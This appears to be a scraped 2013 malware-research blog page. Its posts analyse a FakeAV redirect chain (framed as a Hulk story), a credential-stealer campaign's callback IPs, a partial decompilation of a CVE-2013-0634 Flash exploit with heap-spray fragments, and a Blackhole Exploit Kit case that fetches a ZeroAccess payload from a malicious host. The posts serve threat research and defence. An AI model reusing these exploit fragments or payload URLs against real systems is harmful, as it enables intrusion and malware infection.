Replace these every slider sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.
This is featured post 2 title
Replace these every slider sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.
This is featured post 3 title
Replace these every slider sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.
This is featured post 4 title
Replace these every slider sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.
This is featured post 5 title
Replace these every slider sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.
Java is at the center of yet another security storm after Polish security researchers found not one, but two new separate zero-day flaws in the Web plug-in software.
Web users are once again warned to disable Java immediately to prevent any infection on production machines or networks. Read this
Amid a serious security flaw in the latest version of Java 7, where even the U.S. Department of
It's mid-February and we find the scientist David Banner searching for information concerning tax mattters involving charitable giving and fundraising when he clicks through a Google search link to h00p://jonesfortenberry.com.
Suddenly an Anti-Virus scan begins to run. After a few moments Dr. Banner is informed that his machine has numerous infections.
"Windows Security Alert? Trojan Downloaders and Encoders?" "What the...?? I'm not even using a Windows machine!" Suddenly Dr. Banner realizes what has occurred... his heart rate begins to race.
The transformation begins...
The Nature of Infection
Where David Banner once stood is now a raging green beast. The enraged Hulk roars, "RRRAAARRGHH!!!! Why can't puny malware - leave Hulk alone??" Taking a closer look, Hulk notices the evil culprit; injected Javascript from h00p://anie50sdark.rr.nu/nl.php?p=d The general chain of events showing the level of complexity of this malware.. Additional details can be found here -->>[pastebin link here]
Please note, these domains are dynamic & always changing, so each interaction may be different as per below scheme:
// utilizing rr.nu TDS redirection.. // The site anie50sdark[.]rr.nu & simul12ations.rr.nu is (or was) utilizing the Sitelutions Redirection Engine..
1. anie50sdark[.]rr.nu/nl.php?p=d // IP is 31.184.192.238
2. Redirect via "window.top.location.replace" -->> simul12ations[.]rr.nu/n.php?h=1&s=nl // IP is 67.208.74.71
// from this point the lflink.com redirecting scheme (a Dynamic DNS URL) is utilized to download payload
3. Redirect via meta refresh method -->> www3[.]rle4wibx3.lflink.com/?z5wel=nqrgyamnopVqndXVtWCsW%2BvZ2K%2BglmismpnaZ9tlr4k%3D
// utilizing lflink.com's HTTP redirection 302
4. 302 redirect to main landing page-> www1[.]ezfqriux3154y-4.lflink.com/wk8d3gaz2s?98lssl=Xavk3N2p093K5tjR7p6omplxrmNkb17c3NepmKDH09TbssqHfFug7GplaWijmeLfovHcycKP1%2BGXbpeTwnJqX6zi57DZzOra5ZjM2LWIhFud6WpqcWafoaSemaiXqaaP6OyUpaqntl5asKHQsKmei%2B7a3a%2BdpqxoYmyWrY5kcV7g5rCdmK%2BfqquiqqtmV5mj5o6dp3Xj6uqfk%2BzS1qbg3tqrZGOg35mdp6Oa1uLZi9zY6q%2Fd1ueikp9Y
// another HTTP redirection 302
5. Click to download scandsk.exe -->> www1[.]ezfqriux3154y-4.lflink.com/XxDM1007_5606.php?98lssl=Xavk3N2p093K5tjR7p6omplxrmNkb17c3NepmKDH09TbssqHfFug7GplaWijmeLfovHcycKP1%2BGXbpeTwnJqX6zi57DZzOra5ZjM2LWIhFud6WpqcWafoaSemaiXqaaP6OyUpaqntl5asKHQsKmei%2B7a3a%2BdpqxoYmyWrY5kcV7g5rCdmK%2BfqquiqqtmV5mj5o6dp3Xj6uqfk%2BzS1qbg3tqrZGOg35mdp6Oa1uLZi9zY6q%2Fd1ueikp9Y
// the last chain is the payload download host: www2.f2ep4pjzr9a7e2.gw.lt
6. 302 redirect to scandsk.exe download -->> www2[.]f2ep4pjzr9a7e2.gw.lt/ddiaby1007_5606.php?ue6wsukx9=mdiu4N2y2dud25jN6Vrl096vbpdnm1jlzpq0ppvM2pvYb7fEf5bW7a9qkWecWOTYc%2B7pzbuem8%2BWotKTua%2BwmK3Xq6Kf3NWq65nYzrWOuVjO4HGmoqilZ5JpmWCmnWqd5unM7K7Zb5aWq9nOt6hrh6vZnrKZZ6uopqLabcdinZao46erpW6acJ5rqphpndfk2Nmi1G%2Fc56ujmOzenpWuzpTtmGTj2eHU5qSUldTdWtLc86%2BtwqbUk9%2BLqezVuNjcdtmX09R62dbflg%3D%3D
After completion the user is presented with a convincing dialog box with the option to "remove all" detected malware. When Hulk clicks anywhere on the message he is prompted to download FakeAV the "scandsk.exe". As if possessed, the Hulk screams, "RRAAAARRRGGHHHH!!! "CRUCESIGNATORUM!!! - Hulk summons his friends, the Malware Crusaders to assist with dissecting this evil software.
Meanwhile all of the operations stated above can be download as PCAP here -->>[MediaFire]
Malware Analysis
Erm.. Hi. this is @malwaremustdie.. I just (somehow) got summoned by Hulk, if I understand his words (behind his anger roars) correctly, he wanted us to.. err.. #SMASH!?? (peeking at Hulk..sweating) Obviously No! To analyze the malware he found. :-)
As no one can say no to Hulk in this mode, and to avoid his neighbors calling the police so we must get done to it fast, and here we go:
The malware looks like the below icon (Hulk had some collection) And I am looking at the recent one with the below hash..
Sample : "scandsk.exe" Size: -rwxr--r-- 1 hulk green "953,344" scandsk.exe MD5 : "bb21db6128c344ded94cda582f6d549f" SHA256 : "8ca233cbefc68c39e1210ad9b7ed8d558a3a4939546badbcc4eed53a81f62670"
Entry Point at 0xe66f Virtual Address is 0x40f26f Fake compile time: 2008-08-06 15:52:29 Wrong CRC, Claimed: 992898 Actual: 977558 Invalid import segment, and most of the sections are crypted.
A quick scan in VT -->>[HERE] will show these Malware Names:
If one of these are found somehow malware will not infect properly. If it infects, it will run these operations: Changes your registry PC's DNS server setting into 8.8.8.8 + 192.168.0.1
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce opt %TEMP% C:\Documents and Settings\$USER\ \scandsk.exe
Cleaning your hosts data by rewriting clean hosts file:
"C:\Windows\system32\drivers\etc\hosts.txt" # Copyright (c) 1993-2006 Microsoft Corp. # This is a sample HOSTS file used by Microsoft TCP/IP for Windows. # This file contains the mappings of IP addresses to host names. Each # entry should be kept on an individual line. The IP address should # be placed in the first column followed by the corresponding host name. # The IP address and the host name should be separated by at least one # space. # Additionally, comments (such as these) may be inserted on individual # lines or following the machine name denoted by a '#' symbol. # For example: # 102.54.94.97 rhino.acme.com # source server # 38.25.63.10 x.acme.com # x client host "127.0.0.1 localhost ::1 localhost" # Copyright (c) 1993-2006 Microsoft Corp. # This is a sample HOSTS file used by Microsoft TCP/IP for Windows. # This file contains the mappings of IP addresses to host names. Each # entry should be kept on an individual line. The IP address should # be placed in the first column followed by the corresponding host name. # The IP address and the host name should be separated by at least one # space. # Additionally, comments (such as these) may be inserted on individual # lines or following the machine name denoted by a '#' symbol. # For example: # 102.54.94.97 rhino.acme.com # source server # 38.25.63.10 x.acme.com # x client host "127.0.0.1 localhost ::1 localhost"
Changing your search engine setting into ... h00p://findgala.com (?)
We detect the attempt for spam setting spf record:
v=spf1 a mx ip4:%d.%d.%d.%d/%d ?all
↑which ip4:%d.%d.%d.%d/%d is the malicious IP. Detecting attempt to networking to remote hosts: 46.105.131.123:80 Communicating with remote hosts with the method:
If we execute this scandsk.exe, it goes like this: Soon after just sitting there, the CPU resource will boil up and we'll find that network request started to be sent like: That's my analysis, a FakeAV, sending your data + other malware's downloader. It doesn't do the ransom, will annoy you and make you pay. I'll pass you back to Hulk :-)
Epilogue
Working together, Hulk and the Malware Crusaders work to expose the evil that has taken over the internet. Beware bad guyz (with respect to Liam Neeson from Taken: We don't know who you are. We don't know what you want. If you are looking for ransom, I can tell you we don't have money. But what we do have are a very particular set of skills; skills we have acquired over a very long career. Skills that make us a nightmare for people like you... We I will look for you, we will find you, and we will kill you.
Samples & Research Data
For the research purpose Hulk shares all capture data & sample-->>[Download]
Malware Network ID Analysis
The FakeAV download url: update1.randomstring[.]com/update_c1eec.exe
Registered through: GoDaddy.com, LLC (http://www.godaddy.com) Domain Name: RANDOMSTRING.COM Created on: 30-May-03 Expires on: 30-May-13 Last Updated on: 01-Mar-11 Registrant: "Happy Dude <==LAME 1 Happy St <==LAME HAPPYTOWN <==LAME QLD, None Selected 4000 <==LAME" Australia
"but practically is up & alive.." serial 2013022313 +-a.dns.it (194.0.16.215) serial 2013022313 | +-c.dns.it (194.0.1.22) serial 2013022313 | | +-dns.nic.it (192.12.192.5) serial 2013022313 | | | +-m.dns.it (217.29.76.4) serial 2013022313 | | | | +-nameserver.cnr.it (194.119.192.34) serial 2013022313 | | | | | +-r.dns.it (193.206.141.46) serial 2013022313 | | | | | | +-s.dns.it (194.146.106.30)
The FakeAV used redirector service: Dynamic DNS provided by ChangeIP.com
Domain Name: LFLINK.COM Registrant: "Network Operations, ChangeIP" 1200 Brickell Avenue Suite 1950 Miami, FL 33131, US "Domain servers in listed order: NS1.CHANGEIP.ORG 209.208.5.13 NS3.CHANGEIP.ORG 208.85.240.112 NS2.CHANGEIP.ORG 204.16.175.12
FakeAV TDS domain RR.NU(redirected by Sitelutions Redirection Engine):
.NU Domain Ltd Whois service Domain Name (ASCII): rr.nu Technical Contact:" InfoRelay abuse@sitelutions.com 4 Bridge Plaza Drive Englishtown NJ 07726 US Phone: (703) 485-4600 (voice)" Record last updated on 2011-Oct-17. Record expires on 2016-Nov-4. Record created on 1998-Nov-4. Record status: Active Registrar of record: .NU Domain Ltd Referral URL: http://www.nunames.nu Domain servers in listed order: ns1.sitelutions.com ns2.sitelutions.com ns3.sitelutions.com ns4.sitelutions.com ns5.sitelutions.com "Owner and Administrative Contact information for domains registered in .nu is available upon request from support@nic.nu" Copyright by .NU Domain Ltd - http://www.nunames.nu
This is more than just a malware analysis blog post. Morelike a threat report or updates of a cyber crime group activity that continuing their malicious operation and distribution method, that we think people who use internet must aware about.
The spam driven credentials/PWS stealer group we track, that is known for infecting trojan to steal credential via Blackhole Exploit Exploit Kit, that is responsible to the infection of recent fake FedEx, fake Amazon ticket, fake BBB, fake American Express spams and so on, is recently making a brand new new campaign through the below "real" malware infector domains:
and so on.. (c)MalwareMustDie, the NPO - malicious domain monitoring scheme..
UPDATE: 2013, March 01 Latest domains used by this Bad Actor:
This group is continuing their criminal operation under NAUNET(Russia) rogue registrar, registering & activated malicious domains with rogue registration (see marked words below)
They are keep on updating domains for their crime operation in daily basis, as per pasted evidence here -->>[HERE] ←see the "Last updated" part (=today) We marked NAUNET(RU) as a wellknown malware affiliate registrar. They are starting new infection campaign with the new M.O. as per below details:
Details
New infection methods implemented:
1. Using the (suspected Geo-base)IP rotator base response to infection 2. Starting the infection of the Ransomware for the certain GeoIP. 3. The usage of fake/stolen CA certification is spotted. (thank's to @it4sec)
We monitored this activities for last 4days and exposed 2 reports of this case in the our beloved Pastebin with the links below:
1. Internet service login credentials (ftp/pop3/imap/http) 2. Online cash/transaction information 3. Phishing & fraudulence of online banking
Proof of Concept
First PoC is as per pasted stealer config file here -->>[HERE]
For the security purpose we can not report the Ransomer parts yet, but Credential Stealer Trojan used(Cridex+Fareit) are using callbacks with the below details:
The below communication HTTP headers..(info for filtration purpose)
Method : HTTP/1.1 POST user-agent : Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US) contents-type: application/x-www-form-urlencoded
Callback IPs..
h00p://203.171.234.53:8080 // the url will be plus /XXX(random)/XXX(random)/XXX(random) h00p://221.143.48.6:8080 h00p://64.85.53.168:8080 h00p://180.235.150.72:8080 h00p://213.214.74.5:8080 h00p://210.56.23.100:8080 h00p://173.201.177.77:8080 h00p://184.106.195.200:8080 h00p://199.167.29.136:8080 h00p://62.28.244.251:8080 h00p://85.94.66.2:8080 h00p://72.251.206.90:8080 h00p://188.132.213.178:8080 h00p://78.28.120.32:8080 h00p://88.119.156.20:8080 h00p://188.117.44.241:8080 h00p://217.65.100.41:8080 h00p://37.122.209.102:8080 h00p://195.191.22.90:8080 h00p://195.191.22.40:8080 h00p://195.191.22.97:8080 h00p://195.191.22.37:8080 h00p://82.100.228.130:8080
The hpHOSTS Hosts file has been updated. There is now a total of 185,378 listed hostsnames.If you are NOT using the installer, please read the included Readme.txt file for installation instructions. Enjoy! :)Latest Updated: 13/02/2013 23:00Last Verified: 13/02/2013 18:00Download hpHosts now!http://hosts-file.net/?s=Download
It was all started from a curiosity, and ending up into a serious analysis, testing and reporting.. So we have the SWF exploitation of CVE-2013-0634 and I dare myself to analyze of what we suspect as the sample of it, to try to understand what is really going on there. Warning :-) I am a unix engineer and not a Flash developer, so bear with some missing in here and there. There are still so many unsolved mistery and questions myself, please feel free to ping me in twitter or put your comment for the better thought.
Summary of analysis of a suspected CVE-2013-0634 sample
I'd like to put the conclusion first, since the analysis is long and will be a continuation, The result is not so far to what FireEye released-->>[HERE] But I prefer to peel in more details on the code only and not to include the payload details in this partial post since the exploit details itself is taking a long explanation as per follows:
Summary
The malicious SWF checks/detects whether your system is x32 or x64, it provides both malwares and exploit scheme including the exploit data streams for both platforms (suspected two types of x32 & x64 a shellcodes also exist & still under investigation).
In my case upon the post exploitation it dropsstream-out"extract" a DLL malware file from the embedded binary object. The shellcode itself will drop a malware library into %Temp% path and execute it to drop the malware executable binary.
The extraction embedded attachment process is well explain in the Adobe API reference -->>[HERE] Which I quoted as per below:
ByteArrayAsset is a subclass of the flash.utils.ByteArray class which represents an arbitrary sequence of byte data that you embed in a Flex application.
The byte data that you are embedding can be in any kind of file, and the entire file is always embedded. You cannot embed the bytes of a particular asset that is in a SWF file, although you can embed an entire SWF file.
The MXML compiler autogenerates a class that extends ByteArrayAsset to represent the embedded data. :
The compiler autogenerates a subclass of the ByteArrayAsset class and sets your variable to be a reference to this autogenerated class. You can then use this class reference to create instances of the ByteArrayAsset using the new operator, and you can extract information from the byte array using methods of the ByteArray class:
var storyByteArray:ByteArrayAsset = ByteArrayAsset(new storyClass());
To be NOTED: the binaries are not encoded in JS/code parts, JS/code was used for exploitation act. The post exploit itself runs the function x32 or x64 to extract the object. Which are windows x32 and x64 DLL files. It is aiming ONLY for windows platform, with aiming exploitation for flash versions:
The exploit was said aiming the ActiveX, yes, thus in the sample I analized I saw codes showing the checks on it, BUT, in codes also I saw exploitation scheme for the Flash player without ActiveX support. *) You'll see the explanation of the theory above in the code analysis parts.
The method of flash.utils::ByteArray, following by flash.utils::Endian and the callpropvoid of writeInt to push the malicious Endian codes is the execution part of this exploitation. While before it we can find the usage of stack overflow by malicious codes like 0x41414141 and 0xFFFFFFF8 in the Flash Vector object formed, and the method of using textfield(with having the font parameter in it) to be filled with the vector object formed.
Strings used for exploitation is cleverly scattered between _local* variables, made us difficult to trace it by eyes, so by the help of debugger we can understand the flow.
I'm currently in the middle of separating exploit strings while writing this at the same time & trying to find the solid PoC of shellcode which still in process. Since the reference of exploit in this CVE is still not clear here and there (like some reference mentioning buffer overflow while other mentioning memory corruption) and also considering that new information is still keep on popping up, thus the lack of analysis sample of CVE-2013-0634 SWF file itself (so far I found only ONE "suspected" sample of CVE-2013-0634 posted in VT), made me think to have a break for a while and taking liberty to split the post into parts (1 and 2) make updates in the related topic.
The Sample
New information:
The VT sample "ieee2013.swf" w/hash: bf29f7d83580b4b4355dbc8a82b4972aWAS NOT the CVE-2013-0634,but CVE-2013-0633 embedded swf, #AFatBigLie
At the time I choosed, it was so convincing.. But during analyzing the sample deeper it turned out fakes..
Updates - 2013, Feb 26, just before midnight..
Eric Romang (@eromang) found CVE-2013-0634 in the wild spread by Gong Da(d) Exploit Kit, which can be read in his report here -->>[HERE]The sample he uploaded into Virus Total in here -->>[VIRUS-TOTAL]And I confirmed it as the same code as we posted in this post. Snapshot of the codes is: So this is the hard evidence for this exploit that infects in the wild. For the research purpose, you may confirm yourself here -->>[HERE]I thank Eric Romang for the sharing the information that we must aware of!
It is good to visualize the structure of swf sample. I use Action Script for this purpose, this sample looks like below: We need to break it down now, using SWF dumper tool to see the format:
So let's confirm whether the embedded binaries are really there, if so let's figure its type. Recheck by hex of the symbol class part.. to double check...
All of the variables prepared for exploitation always appears in pairs.. for example like below, suggested different methods used for x32 & x64:
(_local5[_local7][_local22] as Vector. < Number > )[17] = this.UintToDouble(0xFFFFFFFF, _local9); (_local5[_local7][_local22] as Vector. < Number > )[18] = this.UintToDouble(0x41414141, 0);
Despite the pairing scheme, also spotted "generic" code scheme i.e.: Checking the exact version of Windows OS:
It scattered exploit strings into some value of integer with _local%n names, it checked the Windows OS's flash player version & allocate different integer value if flash player contains playertype=activex (see below), ...and...
.. then preparing bigger init value for flash without activeX...
default: (_local5[_local7][_local22] as Vector. < Number > )[536870911] = this.UintToDouble(16, _local9); return; };
The other part of exploit values are implemented into other "_local*" variables in seperated section as per I pasted it here -->>[HERE][Additional] As so many other researchers also already noticed, it is spotted the regex operation suspected the direct exploitation by it. Actually I wanted to expose this after getting more info, but OK, since so many questions came.. here we go: It filled a var with this regex string & assigned it to RegExp:
_local2 = "(?i)()()(?-i)||||||||||||||||||||||"; var _local20: RegExp = new RegExp(_local2, "");
To be used in the operation in forming object of exploitation: Why this regex was used? We saw it to be used as per it is.. To grep the pattern defined, PoC the debug code:
↑At the time regex executed, it runs w/o crash. So if RegEXP aka regex value of "(?i)()()(?-i)||||||||||||||||||||||" has anything to do with the direct exploitation is still a question to me. The exploitation happened at the time the texfield filled with the malicios vector contains the exploit bit (in my case). That's why I desperately need to seek other samples or better memory shot to be sure of this regex method, & reason why I did not write it before too. [NEW ADDITIONAL] The usage of the regex which functioned as the trigger to the overall exploitation is explained by HaifeiLi -->>[HERE] Let's continue: The _local5 array contains vector <number> and <object> and the below checkpoints was making sure of it if we follow it further the _local5 will be used by additional hard-coded bits: Next.. depends on the processor type it assembled the strings by - using writeUnsignedInt. This is that code for x32...
// initiation of the bins.. see the 0x41 0x41 0x41 starts.. while (_local1 < (0x0400 * 100)) { _local17.writeUnsignedInt(0x41414141); _local1++; };
// transfering the result to other vars... _local12 = (_local12 + _local17.position); _local14 = _local17.position;
The _local17 above was filled by values of vector objects filled by the logic of Random → Vector flood by ByteArray → formed into function ReadDouble to be used to form exploit object, flow details is--->>[HERE]Please be noted the usage of hard coded bit 0x41414141 in the vector object and usage of 0xFFFFFFF8 for gaining heap allocation/deallocation is used. Correction:0xFFFFFFF8 is used to convert 0x*******1 to 0x*******0 which is the correct address for exploit. ) ←Thank's to @promised_lu for pointing this :-) PS: I still can't figure why the hardcoded 0x41414141 bit is there... The usage of text field with font to be filled by exploit values aiming for the overflow was also detected:
function empty(): void { " var _local1: textfield = new textfield();" _local1.autosize = TextFieldAutoSize.left; var _local2: textformat = new textformat(); _local2.size = 30; _local2.font = "Arial"; _local2.color = 0xFF0000; " _local1.settextformat(_local2);" _local1.text = " "; " addChild(_local1);"
After exploit form is built, it went into an execution of part of the forming code the object which in the debug code can be viewed below:
↑It means: using the flash.utils::ByteArray to write integer as little endian (I call this stream-out referred to Adobe API = "extracting") ..to WriteIntvalues as per mixed in hex-->>[HERE](need to split these in two for x32 and x64.. a lot ow work to do..) ..to then execute process below:
..at this point the return for value pointing LadyBoyle x32 OR x64 binary Class (the code is below)
import mx.core.*; public class LadyBoyle_the_x32_Class extends ByteArrayAsset {
↑for the x32 ..and for the x64↓
import mx.core.*; public class LadyBoyle_the_x64_Class extends ByteArrayAsset {
to extract the embedded object as per described here -->>[AdobeAPIPage]The complete decompilation code of the SWF of CVE-2013-6034 in neutralized code is here -->>[PASTEBIN]
The debug..
It's time to run this swf in debug mode.. like a binary analysis I want to capture everything I could. The (long) complete debug main init trace list is here --->>[HERE]See how it ends up to point classes of the_x32_Class:Class or the_x64_Class:Class You also can grep the "pushint" to grep all of the pushed value related codes - for the x32 and x64 -->>[HERE]If we divided it right we may slit the value of x32 and x64. (on it..)You can compare those strings with the memory snapshot here --->>[HERE]The dump binary can be downloaded here -->>[HERE] Since the code initiate the 32 & 64 bit as detailed classes↓...
The getlex for objects→ByteArray→ByteArrayAsset→is calling embedded "LadyBoyle" class contains malware DLL binary to be extracted in the victim's PC.. [Additional-2] @promised_lu, the author of pmswalker was making a very good reversing for the this exploit sample which exposing security baypass' ROP Chain & SHELLCODE formed during exploitation. You can see his good analysis here -->>[LINK] This is VERY important chain that I was looking for from beginning the existance of the shellcode which explained the below operations: Searching for %Temp% path and load a library, as per below:
With noted that shellcode use of stackpivot restore the stack back to the normal flow of execution to prevent the crash. He also reversed the abc.cfg executed as libs via shellcode:
↑which explaining the dropping of seccetnter.xxx payload. All of the above is possible since the ALSR and DEP are bypassed, and he explianed the ROP Chain for it as per quoted below:
#w00t to @promised_lu :-) good job! This solves the all mistery of this exploitation, conclusion:
The usage of hardcoded bits, details in address calculation, using the heap spray with the changes of stack value (stackpivot), with the ROP of by passing ASLR and DEP is a VERY sophisticated technique to be used in this exploitation. The technique exploitation of this sample is proven to be Memory Corruption base of the exploitation.
Research Material & Samples
For raising AV detection rates & research purpose, sample-->>[HERE]The SWF's embedded DLL malwares is having the below VT ratio:
I had little discussion with Eric Romang about this matter in twitter. Since this CVE is new, maybe NOW we won't see the false positive of this post's code to be detected as "malware" by some security industry scanner, but I am afraid since most web-scanner is doing string matching for detection of "malcode" in web sites, sooner or later FP will occur, so beforehand I am assuring you there is no malicious codes were posted as per it is here, every code are tweaked, neutralized and cannot run nor be used to infect at all. Furthermore most codes shown are flash JS/code which cannot use as per usual web site's embedded JavaScript.
I am so worry that if some security scanner will use the word "LadyBoyle" to grep & classify the detection of CVE-2013-0634, which exactly will NOT stop the infection of CVE-2013-0634 (since that is just a name of a "changeable" class inside an infector SWF file which I doubt that you can scan it online) BUT it will exactly will block this post to be viewed by public.
This post is dedicated to the security research, hopefully to be a useful reference of CVE-2013-0634, please kindly help to notice us in twitter if the false positive alarm happens. Thank you very much.
Additionals
Just seeing this tweet:
The other Flash 0day found in the wild & used against Mac OS X (CVE-2013-0634) results from an integer overflow in CFF font handling #Flash
I really want to see the sample, if anyone has it please upload it via our blog's DropBox?
The mentioned "font method", or to be precised, in our case was the usage of textfield object (to be filled with exploit data) with setting .settextformat contains a font definition, indeed detected too in this post, but did not see any MacOSX target in my sample, so that must be same type of exploit yet a separately made. I wonder was it a only a MS Word's .doc file?
Reference
[1] Adobe: Security Bulletin APSB13-04 for Adobe Flash Player-->>[Here] [2] CVE-2013-0633 -->>[Here] [3] CVE-2013-0634 -->>[Here] [4] FireEye: LadyBoyle comes to town with new exploit-->>[Here] [5] Alienvault Labs: Adobe patches two vulnerabilities being exploited in the wild-->>[Here] [6] Eric Romang Blog: Boeing-job.com Campaign & Flash 0days Additional Informations-->>[Here]
[NEW!] New case infection w/same payload type & infection MO in different domain. Landing page: 3thtyjtyjcc.ns02.us/closest/209tuj2dsljdglsgjwrigslgkjskga.php Payload: ZeroAccess Exploit: Java: #CVE-2010-4476 #CVE-2013-0422, PDF: #CVE-2010-0188, CVE-2009-0927 Sorry for the report in text--> http://pastebin.com/raw.php?i=HPESHngh
I am on a half way on a plane of a long trip, got many spare time so I checked some queries to malware site. I received the report to investigate a Blackhole Exploit Kit, the clue was the infected domain of 33sdfguuh.mywww.biz, I had no idea so the first try I did was requesting the domain in the urlquery and ending up with the below suspected landing page url:
The inside was the common Backhole v2.x's landing Page ofuscation, which manually cracked to be plugin detect script like this -->>[PASTEBIN] Some of the highlight are below:
1. The usage of the pair of directories of /closest/ & 2. they don't put shellcode or the malware payload download in the landing page, instead scattered in the exploit file infector. 3. two pdfs, two jars and one payload.
BHEK is BHEK, by using our guideline -->>[HERE] you can get these samples: FYI the 2 PDFs urls is are as per below (this is for people who got attack by these Blackhole which mostly seeing these PDF downloads URL in their log..)
I started to get the payload from the smallest size of PDF, to find the JS/Evil/Code written in the 0x11AF-0x2768 section with text below: The red mark is the evil script, where the purple mark is the long obfuscation var/array, and the yellow mark is the deobfuscator logic. Following the usual method to decode this, we'll find the infector script burped as per first upper part below, marked area is the shellcode in text: And the lower part which having Libtiff overflow CVE-2010-0188 exploit code: *) Noted: I marked the part it checked the Adobe version. Well shortly the shellcode will look like below, contains the payload's url: Well, I just downloaded it..
GET /closest/209tuj2dsljdglsgjwrigslgkjskga.php?rjh=30:1n:%201i:1i:33&ofa=30:33:1n:1m:1h:33:30:1o:30:1h&omtvgame=1i&tdn=trnwuek&hxx=ynkt HTTP/1.0 Referer: http://malwaremustdie.blogspot.com User-Agent: Gottcha! Host: 33sdfguuh.mywww.biz : HTTP request sent, awaiting response... HTTP/1.1 200 OK Server: nginx/1.2.6 Date: Tue, 05 Feb 2013 13:17:33 GMT Content-Type: application/x-msdownload Content-Length: 176128 Connection: keep-alive X-Powered-By: PHP/5.3.10-1ubuntu3.4 Pragma: public Expires: Tue, 05 Feb 2013 13:17:40 GMT Cache-Control: must-revalidate, post-check=0, pre-check=0 Cache-Control: private Content-Disposition: attachment; filename="contacts.exe" Content-Transfer-Encoding: binary : 200 OK Registered socket 1892 for persistent reuse. Length: 176128 (172K) [application/x-msdownload] Saving to: `contacts.exe' 2013-02-05 22:17:37 (84.9 KB/s) - `contacts.exe' saved [176128/176128]
Now we have the payload below: *)Noted: I marked my local time of my PC when I fetched. Nothing special about the file's looks & dull-usual name of contacts.exe
Debug investigation of the payload
So it's time to debug it to understand: 1. First the moronz encrypted the binary, see -->>[HERE] the section .text and .data was garbled, trailing the bins made me only stuck at the 0x40A209 in .text section:
0x40A209 add esi, 1Fh 0x40A20C pushf 0x40A20D or word ptr [esp], 1 0x40A212 nop 0x40A213 popf 0x40A214 wait 0x40A215 push ebp 0x40A216 wait 0x40A217 pop ebp 0x40A218 nop 0x40A219 rep cld 0x40A21B jb loc_40A49D 0x40A221 pop ds 0x40A222 pop ds 0x40A223 cmp dl, bh 0x40A225 push ecx : (skip) 0x40A229 var_44 = word ptr -6583D684h 0x40A229 var_42 = byte ptr -6583D682h 0x40A229 var_25 = byte ptr -6583D665h 0x40A229 var_23 = byte ptr -6583D663h : (skip) 0x40A2F9 ; FUNCTION CHUNK AT 0x40A6EF 0x40A2F9 ; FUNCTION CHUNK AT 0x40A839 0x40A2F9 ; FUNCTION CHUNK AT 0x40A874 : (skip) 0x40A2F9 ; FUNCTION CHUNK AT 0x40FC08 0x40A2F9 ; FUNCTION CHUNK AT 0x40FC63
2. Shortly I figured some mistery by debugging it to find these clue: This mess loading DLL by using these methods..
LdrLoadDll LdrGetDllHandle
Use below command to decrypt:
uncrypted.exe Microsoft Base Cryptographic Provider v1.0
A nice attempt to use his filename to save itself..
TEMP= \InstallFlashPlayer.exe
Internet access command -1- Get GeoIP Info & safe/get CN code..
GET /app/geoip.js HTTP/1.0 Host: j.maxmind.com Connection: close : geoip_country_code
If you simulate this into your browser, you'll get your all GeoIP data + lat/long coordinates.Internet access command -2- get the counter...
GET /5699017-3C912481A04E584CDF231C519E1DF857/counter.img?theme=%u&digits=10&siteId=%u HTTP/1.1 Host: bigfatcounters.com User-Agent: Opera/9 (Windows NT %u.%u; %s; %s) Connection: close
I dumped this data from memory after fetching the last URL above... ↑oh.. is an image file.. a counter↓
Behavior Analysis
So what was happened when I run it? It was as per below snapshot: The execution of CMD for self (copy+)deletion.. It requests the DNS query to the google, AND to these specific IP!↓
A short session of infection goes like this: And these are the snapshot of UDP, malform DNS requests I was talking about: It sent the malform DNS with the request is like this: Any idea what is this, friends? :-) Furthermore let's see what's the file process & networking + registry-->>[HERE]Is a full run log on asession of one infection I made it on my PC :-) Please try to grep values like "RegSet" or "CreateFile", "UDP" to be more focus in understanding how this malware's work. In registry there's some changes in:
Now I know why it seeked those strings of programs in debugging, to DELETE them.. Moreover saw an a fail attempt of starting the Active Directory Domain Services Database Mounting Tool or SERVICES_ACTIVE_DATABASE, binding to the localhost...
What's this mess?
So we are dealing with what malware then? 1) a trojan (for sure, by all infection MO & erasing stuffs) + staring service, but for what? I wonder what would happened if one of those request to had seccessfully established. IF it sent data then we have 2) a spyware which is having these characteristics. Let's reseacrh further, viewing the way it made changes in registry at the recycle keys/values made made me bumped to the good writing about ZeroAccess Recycler version here -->>[TigzyBlog]And UDP/16464 found it as the ZeroAccess/alias MaxPlus, Sirefef variant. Thank's to the Tigzy-RK for a useful writing -->Tigzy-RKAnd all of the advices I received, I thank you.
Samples
Here's the overall samples -->>[HERE](Samples are shared for raising detection ratio & research purpose) *) Thank you to @Horgh_rce for adding the unpack version of the malware. It's really good to know that I didn't miss a thing during debugging.
Virus Total
Below is detection ratio as per detected moment of the samples in VT:
I don't have time to check these all but all of these BHEK are infecting same ZeroAccess variant now. Marked the domain name & BHEK "/closest" path: The PoC of the list in the picture above is --->>[HERE] and here -->>[HERE]
Thank you for your help, advice & cooperation!
The trojan is the ZeroAccess recycler variant. Unpacked : 36e5a4019e41cc52247a558afc794b57— Horgh (@Horgh_rce) February 5, 2013
And I currently trace all infected machines (a lot more then 500,000 ip) you can contact me if you want more info.— Hugo Caron (@y0ug) February 5, 2013
Traffic on 16464/UDP - 16471/UDP is a sign of ZeroAccess trojan— Gary Portnoy (@gxp7891) February 6, 2013
RSS Feed
Twitter
20:40
nam tóc xù
Soon after just sitting there, the CPU resource will boil up and we'll find that network request started to be sent like: 
That's my analysis, a FakeAV, sending your data + other malware's downloader. It doesn't do the ransom, will annoy you and make you pay. I'll pass you back to Hulk :-) 
We need to break it down now, using SWF dumper tool to see the format: 
Why this regex was used? We saw it to be used as per it is.. To grep the pattern defined, PoC the debug code: 
if we follow it further the _local5 will be used by additional hard-coded bits: 
FYI the 2 PDFs urls is are as per below (this is for people who got attack by these Blackhole which mostly seeing these PDF downloads URL in their log..) 
